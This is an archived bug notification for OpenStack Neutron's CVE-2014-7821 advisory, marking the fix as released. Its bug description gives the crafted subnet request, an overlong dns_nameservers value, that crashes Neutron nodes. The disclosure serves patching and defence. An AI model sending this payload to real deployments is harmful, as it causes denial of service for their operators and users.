yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1378450] Re: [OSSA 2014-039] Maliciously crafted dns_nameservers will crash neutron (CVE-2014-7821)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Thierry Carrez <thierry.carrez+lp@xxxxxxxxx>
Date: Thu, 18 Dec 2014 14:26:39 -0000
Reply-to: Bug 1378450 <1378450@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Changed in: neutron
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1378450

Title:
  [OSSA 2014-039] Maliciously crafted dns_nameservers will crash neutron
  (CVE-2014-7821)

Status in OpenStack Neutron (virtual network service):
  Fix Released
Status in neutron icehouse series:
  Fix Committed
Status in neutron juno series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  The following request body will crash neutron nodes.

  {"subnet": {"network_id": "2aeb163a-a415-4568-bb9e-9c0ac93d54e4", "ip_version": 4, 
  "cidr": "192.168.1.3/16", 
  "dns_nameservers": ["111111111111111111111111111111111111111111111111111111111111"]}}

  Even strace stops logging.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1378450/+subscriptions